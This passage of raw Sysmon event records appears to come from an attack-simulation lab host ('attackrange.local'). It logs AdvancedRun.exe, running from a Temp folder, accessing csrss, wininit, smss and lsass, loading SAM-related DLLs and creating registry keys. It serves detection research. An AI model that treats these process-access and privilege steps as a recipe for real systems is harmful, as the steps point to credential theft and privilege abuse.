20:17:51.453{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080421Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.453{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080420Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.453{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080419Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.452{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004080418Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.452{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004080417Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.451{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 13241300x80000000000000004080352Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:31.016{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 13241300x80000000000000004080351Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:31.014{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 12241200x80000000000000004080350Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:31.011{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004080349Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:31.011{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004080348Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:31.010{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004080347Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:31.010{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 13241300x80000000000000004080344Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:31.009{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 13241300x80000000000000004080343Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:31.003{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 12241200x80000000000000004080342Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:31.002{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersATTACKRANGE\Administrator 12241200x80000000000000004080341Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:31.002{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceATTACKRANGE\Administrator 13241300x80000000000000004080340Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:29.822{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 13241300x80000000000000004080339Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:29.821{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 12241200x80000000000000004080338Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:29.818{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004080337Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:29.818{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004080336Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:29.817{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004080335Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:29.817{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 13241300x80000000000000004080334Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:29.817{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 13241300x80000000000000004080333Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:29.811{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 12241200x80000000000000004080332Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:29.811{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersATTACKRANGE\Administrator 12241200x80000000000000004080331Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:29.811{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceATTACKRANGE\Administrator 734700x80000000000000004080328Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:29.433{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleacc.dll7.2.14393.4169 (rs1_release.210107-1130)Active Accessibility Core ComponentMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEACC.DLLMD5=0C5492DFFA271BC1912BADFEBB497907,SHA256=536C445B9D489749547FAC1D0B01AF7F430BBFE31BCD2924E7DB3BFE66785452trueMicrosoft WindowsValidATTACKRANGE\Administrator 13241300x80000000000000004080327Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:28.855{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 13241300x80000000000000004080326Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:28.846{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 12241200x80000000000000004080325Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:28.842{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004080324Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:28.842{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InstanceATTACKRANGE\Administrator 734700x80000000000000004080315Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.837{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=A612555310B7F2A688FA57C7C10615BC,SHA256=028B8BA6A6CF74776C8E4F7485BB7973DE25242F292F837D78AB9CFCC3E8AC90trueMicrosoft WindowsValidATTACKRANGE\Administrator 12241200x80000000000000004080299Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:28.839{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 12241200x80000000000000004080298Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:28.839{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKCR\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceATTACKRANGE\Administrator 13241300x80000000000000004080297Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:28.838{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 734700x80000000000000004080295Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.835{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\samlib.dll10.0.14393.4530 (rs1_release.210705-0736)SAM Library DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMLib.DLLMD5=1029851F233A4FFD537D7B924F6078E9,SHA256=48FAA459585093FD2423A991B264219E5D7E0D37328D5CE6BDA917AB02607E31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004080294Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.835{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\samcli.dll10.0.14393.0 (rs1_release.160715-1616)Security Accounts Manager Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSAMCLI.DLLMD5=F67DFB27AACE637BEA56D3EB0726B943,SHA256=3663C2F3579BEBAF433AF101902ADA3FF87A3A6005F0AF77D1894458286E3656trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004080293Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.834{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004080292Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.834{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004080291Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.833{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=12ED40D048D0F5F44D3877936A1B7E8B,SHA256=8E652B0663D0F0C6BFE7102329C9A84FB1E937273E51F8FF0FC3469350AF5C41trueMicrosoft WindowsValidATTACKRANGE\Administrator 13241300x80000000000000004080290Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-21 20:17:28.830{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500_Classes\Local Settings\MuiCache\121\52C64B7E\LanguageListBinary DataATTACKRANGE\Administrator 12241200x80000000000000004080289Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:28.830{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersATTACKRANGE\Administrator 12241200x80000000000000004080288Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-CreateKey2022-01-21 20:17:28.829{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceATTACKRANGE\Administrator 734700x80000000000000004080287Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:28.829{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\actxprxy.dll10.0.14393.3808 (rs1_release.200707-2105)ActiveX Interface Marshaling LibraryMicrosoft® 